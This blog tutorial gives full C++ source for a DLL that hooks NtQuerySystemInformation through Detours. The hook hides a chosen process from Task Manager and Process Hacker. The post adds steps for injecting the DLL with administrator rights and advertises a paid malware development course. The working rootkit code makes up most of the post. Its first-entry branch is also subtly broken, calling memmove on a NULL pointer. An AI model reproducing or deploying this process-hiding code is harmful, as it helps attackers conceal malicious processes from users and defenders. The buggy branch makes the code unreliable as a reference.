Hide Processes in Task Manager
Welcome to my new article today i will show you how i created a basic DLL to implement a rootkit user mode technique to hide your process from Task Manager, Process Hacker, and all the processes list that use the NtQuerySystemInformation function.
Introduction
And if you want to learn the basics about Windows Malware Development you have my Introduction course available from $15. Now until end of 2023 year you have a $5 discount with the “christmas” code.
*Send a email for crypto payments: s12deff@gmail.com *
In this article, we delve into the intriguing realm of process concealment within the Windows operating system. As a red teamer and ethical malware developer proficient in C++, I will guide you through the creation of a fundamental DLL. This DLL employs a user-mode rootkit technique, strategically concealing your processes from the discerning eyes of Task Manager, Process Hacker, and other process lists utilizing the NtQuerySystemInformation function. Join me in unraveling the intricacies of the NtQuerySystemInformation function (winternl.h) as we navigate the landscape of system information retrieval in Win32 applications.
Code
#include <stdio.h>
#include <Windows.h>
#include <shlwapi.h>
#include "pch.h"
#include "detours.h"
#include <Winternl.h>
#define HIDE_PROCNAME L"notepad.exe"
typedef NTSTATUS(NTAPI* NtQuerySystemInformation_t)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
NtQuerySystemInformation_t origNtQuerySystemInformation = NULL;
NTSTATUS NTAPI HookedNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) {
NTSTATUS status = origNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
if (SystemInformationClass == SystemProcessInformation) {
PSYSTEM_PROCESS_INFORMATION pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
PSYSTEM_PROCESS_INFORMATION pPrevious = NULL;
while (true) {
if (pCurrent->ImageName.Buffer != NULL &&
wcsstr(pCurrent->ImageName.Buffer, HIDE_PROCNAME) != NULL) {
if (pPrevious == NULL) {
pCurrent = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->NextEntryOffset);
if (pCurrent->NextEntryOffset != 0) {
memmove(pPrevious, pCurrent, (PCHAR)pCurrent - (PCHAR)pPrevious);
pCurrent = pPrevious;
}
else {
pPrevious->NextEntryOffset = 0;
}
}
else {
pPrevious->NextEntryOffset += pCurrent->NextEntryOffset;
}
}
if (pCurrent->NextEntryOffset == 0) {
break;
}
pPrevious = pCurrent;
pCurrent = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->NextEntryOffset);
}
}
return status;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
origNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(GetModuleHandle(L"ntdll.dll"),"NtQuerySystemInformation");
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)origNtQuerySystemInformation, HookedNtQuerySystemInformation);
DetourTransactionCommit();
break;
case DLL_PROCESS_DETACH:
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)origNtQuerySystemInformation, HookedNtQuerySystemInformation);
DetourTransactionCommit();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}This code is a DLL (Dynamic Link Library) that hooks into the NtQuerySystemInformation function, a Windows API function responsible for retrieving system information. The primary goal of this code is to hide a specific process, in this case, “notepad.exe,” from the list of running processes obtained through the SystemProcessInformation class.
Here’s a breakdown of the key components:
- NtQuerySystemInformation_t typedef:
- Defines a function pointer type for the NtQuerySystemInformation function, which is used to retrieve system information.
- Global Variables:
HIDE_PROCNAME: The name of the process ("notepad.exe") that the code aims to hide.
- HookedNtQuerySystemInformation function:
- The replacement function for NtQuerySystemInformation.
- It calls the original NtQuerySystemInformation function and then iterates through the list of running processes obtained from the system information.
- If it finds a process with the name specified in
HIDE_PROCNAME(notepad.exe), it removes it from the list.
- DllMain function:
- Entry point for the DLL.
- During DLL_PROCESS_ATTACH, it retrieves the address of the original NtQuerySystemInformation function and attaches the hook (replacement function).
- During DLL_PROCESS_DETACH, it detaches the hook.
- DetourTransactionBegin/UpdateThread/Attach/Commit:
- These functions are part of the Detours library, which is used for function hooking.
DetourTransactionBeginandDetourTransactionCommitmark the beginning and end of a transaction for hooking.DetourUpdateThreadspecifies the thread for the transaction.DetourAttachandDetourDetachare used to attach and detach the hook.
In summary, this code serves as a basic example of a user-mode rootkit technique, where it intercepts calls to NtQuerySystemInformation to manipulate the list of running processes and hide a specified process from being detected.
Proof of Concept
Let’s inject into task manager and check if it’s working!
First we open a Task Manager, a notepad and finally a process hacker 2 with admin privileges.
Why admin privileges?
The task manager process it’s impossible to inject DLL’s if your not Administrator or NT AUTHORITY SYSTEM (more than Administrator).
Done! What’s next?
The next step it’s basically with Process Hacker 2 inject the DLL, let’s check if it’s working!
With this option you can easily inject the DLL, also you can create a code to inject it, but to do the proof of concept it’s easier.
We inject it, and now the notepad.exe it’s not showed and is still running:
And with process hacker is showed:
If we inject in process hacker 2 also, disappear:
Conclusions
In conclusion, this article delved into the intricate world of process concealment within the Windows operating system, presenting a practical demonstration of a user-mode rootkit technique using a basic DLL. By intercepting calls to the NtQuerySystemInformation function, the code strategically hid a specified process, “notepad.exe,” from common process monitoring tools such as Task Manager and Process Hacker.
The provided code showcased the implementation details, employing function hooking with the Detours library to manipulate the list of running processes. The Proof of Concept section demonstrated the effectiveness of the technique by successfully hiding the targeted process from view, both in Task Manager and Process Hacker.
And if you want to learn the basics about Windows Malware Development you have my Introduction course available from $15. Now until end of 2023 year you have a $5 discount with the “christmas” code.
*Send a email for crypto payments: s12deff@gmail.com *
If you enjoy my content and would like to help me take this project to the next level, you can become a member by donating a monthly subscription. Your support will help me continue to create high-quality content. Thank you for your generosity!
If donating is not possible for you at this time, no problem at all! Your support in sharing my project and spreading the word is greatly appreciated. I will continue to create and share my work regardless, and I am grateful for your encouragement and interest.
Thanks to read this :)
S12.
